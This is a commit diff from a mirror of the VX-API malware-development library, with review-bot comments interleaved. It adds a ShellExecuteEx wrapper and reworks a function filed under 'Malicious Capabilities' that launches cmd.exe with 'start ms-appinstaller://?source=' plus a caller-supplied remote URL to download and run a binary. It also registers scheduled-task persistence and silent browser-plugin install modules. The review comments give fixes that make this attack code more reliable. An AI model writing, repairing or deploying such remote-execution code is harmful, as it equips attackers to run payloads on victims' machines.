mirror of https://github.com/vxunderground/VX-API
parent
64a72b97f8
commit
e8c5cd442d
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.396
|
||||
Version: 2.0.402
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -114,6 +114,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| GetByteArrayFromFile | smelly__vx | Helper Functions |
|
||||
| Ex_GetHandleOnDeviceHttpCommunication | x86matthew | Helper Functions |
|
||||
| IsRegistryKeyValid | smelly__vx | Helper Functions |
|
||||
FastcallExecuteBinaryShellExecuteEx | smelly__vx | Helper Functions |
|
||||
| GetKUserSharedData | Geoff Chappell | Library Loading |
|
||||
| GetModuleHandleEx2 | smelly__vx | Library Loading |
|
||||
| GetPeb | 29a | Library Loading |
|
||||
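--- a/FastcallExecuteBinaryShellExecuteEx.cpp
+++ b/FastcallExecuteBinaryShellExecuteEx.cpp
@@ -0,0 +1,39 @@
+#include "Win32Helper.h"
+
+BOOL FastcallExecuteBinaryShellExecuteExW(_In_ PWCHAR FullPathToBinary, _In_ PWCHAR OptionalParameters)
+{
+SHELLEXECUTEINFOW Execute = { 0 };
+
+Execute.cbSize = sizeof(SHELLEXECUTEINFOW);
+Execute.lpVerb = L"open";
+Execute.nShow = SW_SHOW;
+
+if (!FullPathToBinary)
+return FALSE;
+
+Execute.lpFile = FullPathToBinary;
+
+if (OptionalParameters)
+Execute.lpParameters = OptionalParameters;
+
+return ShellExecuteExW(&Execute);
+}
+
+BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHAR OptionalParameters)
+{
+SHELLEXECUTEINFOA Execute = { 0 };
+
+Execute.cbSize = sizeof(SHELLEXECUTEINFOW);
+Execute.lpVerb = "open";
+Execute.nShow = SW_SHOW;
+
+if (!FullPathToBinary)
+return FALSE;
+
+Execute.lpFile = FullPathToBinary;
+
+if (OptionalParameters)
+Execute.lpParameters = OptionalParameters;
+
+return ShellExecuteExA(&Execute);
+}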
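Review bot: `FastcallExecuteBinaryShellExecuteExA` sets `Execute.cbSize = sizeof(SHELLEXECUTEINFOW)` on a `SHELLEXECUTEINFOA`; the two structs happen to be the same size, so this works by accident, but the line should be `Execute.cbSize = sizeof(SHELLEXECUTEINFOA);` so the size follows the type `Execute` is declared with. Both variants test `if (OptionalParameters)` before using it, yet the prototypes added to Win32Helper.h in this commit annotate that parameter `_In_`; `_In_opt_ PWCHAR OptionalParameters` (and `_In_opt_ PCHAR` for the A variant) would match the contract the body actually implements. Since `Execute` is zero-initialised and `fMask` is never set, no process handle is retained and the return value only reports whether the shell accepted the request; a one-line comment above each function, e.g. `// Returns ShellExecuteEx's result only; no handle to the launched process is kept (fMask is 0).`, would save callers from assuming they can wait on or inspect the child.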
@ -6,23 +6,20 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In
|
|||
// NOTE: Will display an error stating MS-APPINSTALLER PROTOCOL IS DISABLED
|
||||
// it must be enabled...
|
||||
|
||||
SHELLEXECUTEINFOW Info = { 0 };
|
||||
PWCHAR Payload = NULL;
|
||||
WCHAR CmdPath[28] = L"C:\\Windows\\System32\\cmd.exe";
|
||||
DWORD dwPayloadLength = ERROR_SUCCESS;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Info.cbSize = sizeof(SHELLEXECUTEINFOW);
|
||||
Info.lpVerb = L"open";
|
||||
Info.nShow = SW_SHOW;
|
||||
Info.lpFile = CmdPath;
|
||||
WCHAR CmdPath[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
dwPayloadLength = 36;
|
||||
dwPayloadLength += RemoteUrlLengthInBytes;
|
||||
|
||||
if (!CreateWindowsObjectPathW(CmdPath, (PWCHAR)L"\\System32\\cmd.exe", MAX_PATH * sizeof(WCHAR), TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Payload = (PWCHAR)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwPayloadLength);
|
||||
if (Payload == NULL)
|
||||
return FALSE;
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyW(Payload, (PWCHAR)L"/c start ms-appinstaller://?source=") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -30,9 +27,7 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In
|
|||
if (StringConcatW(Payload, RemoteUrlTextFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Info.lpParameters = Payload;
|
||||
|
||||
bFlag = ShellExecuteExW(&Info);
|
||||
bFlag = FastcallExecuteBinaryShellExecuteExW(CmdPath, Payload);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
|
@ -48,23 +43,20 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_
|
|||
// NOTE: Will display an error stating MS-APPINSTALLER PROTOCOL IS DISABLED
|
||||
// it must be enabled...
|
||||
|
||||
SHELLEXECUTEINFOA Info = { 0 };
|
||||
PCHAR Payload = NULL;
|
||||
CHAR CmdPath[28] = "C:\\Windows\\System32\\cmd.exe";
|
||||
DWORD dwPayloadLength = ERROR_SUCCESS;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Info.cbSize = sizeof(SHELLEXECUTEINFOA);
|
||||
Info.lpVerb = "open";
|
||||
Info.nShow = SW_SHOW;
|
||||
Info.lpFile = CmdPath;
|
||||
CHAR CmdPath[MAX_PATH] = { 0 };
|
||||
|
||||
dwPayloadLength = 36;
|
||||
dwPayloadLength += RemoteUrlLengthInBytes;
|
||||
|
||||
if (!CreateWindowsObjectPathA(CmdPath, (PCHAR)L"\\System32\\cmd.exe", MAX_PATH, TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Payload = (PCHAR)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwPayloadLength);
|
||||
if (Payload == NULL)
|
||||
return FALSE;
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyA(Payload, (PCHAR)"/c start ms-appinstaller://?source=") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -72,9 +64,7 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_
|
|||
if (StringConcatA(Payload, RemoteUrlTextFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Info.lpParameters = Payload;
|
||||
|
||||
bFlag = ShellExecuteExA(&Info);
|
||||
bFlag = FastcallExecuteBinaryShellExecuteExA((PCHAR)"C:\\Windows\\System32\\cmd.exe", Payload);
|
||||
|
||||
EXIT_ROUTINE:
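Review bot: In the ANSI variant the new call `CreateWindowsObjectPathA(CmdPath, (PCHAR)L"\\System32\\cmd.exe", MAX_PATH, TRUE)` passes a wide literal cast to `PCHAR`; read as a narrow string that literal is just `"\"` (its second byte is the high zero byte of the first UTF-16 unit), so `CmdPath` can never hold the intended path. The defect is masked because the following hunk hard-codes `(PCHAR)"C:\\Windows\\System32\\cmd.exe"` in the `FastcallExecuteBinaryShellExecuteExA` call instead of passing `CmdPath`, whereas the W variant passes `CmdPath`, so `CmdPath` in the A variant is built and then never used. The fix is the narrow literal `(PCHAR)"\\System32\\cmd.exe"` and `bFlag = FastcallExecuteBinaryShellExecuteExA(CmdPath, Payload);`, which also restores symmetry with the W variant and drops the hard-coded system-drive assumption the rewrite appears intended to remove. Separately, on the unchanged context lines of both variants, `dwPayloadLength = 36` plus `RemoteUrlLengthInBytes` looks too small for the W variant, where `StringCopyW` alone writes 72 bytes for the 35-character prefix before the URL is appended — if `RemoteUrlLengthInBytes` is the URL's byte length this is a heap overrun, so the allocation should be sized in `sizeof(WCHAR)` units or checked before the copy. Both functions begin and end outside these hunks.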
|
||||
|
||||
@ -157,6 +157,7 @@
|
|||
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp" />
|
||||
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp" />
|
||||
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
|
||||
<ClCompile Include="GetByteArrayFromFile.cpp" />
|
||||
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
|
||||
<ClCompile Include="GetCurrentLocaleFromTeb.cpp" />
|
||||
|
@ -227,6 +228,7 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="MpfLolScheduledPersistenceByAt.cpp" />
|
||||
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
|
||||
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
|
||||
<ClCompile Include="OleGetClipboardData.cpp" />
|
||||
@ -456,6 +456,12 @@
|
|||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfLolScheduledPersistenceByAt.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
@ -204,6 +204,8 @@ BOOL GetByteArrayFromFileW(_Inout_ PBYTE Buffer, _In_ PWCHAR Path, _In_ ULONGLON
|
|||
BOOL GetByteArrayFromFileA(_Inout_ PBYTE Buffer, _In_ PCHAR Path, _In_ ULONGLONG BytesToRead);
|
||||
BOOL Ex_GetHandleOnDeviceHttpCommunication(_Out_ PHANDLE Handle);
|
||||
DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path);
|
||||
BOOL FastcallExecuteBinaryShellExecuteExW(_In_ PWCHAR FullPathToBinary, _In_ PWCHAR OptionalParameters);
|
||||
BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHAR OptionalParameters);
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
@ -259,7 +261,6 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In
|
|||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
EVASION
|
||||
*******************************************/
|
||||
|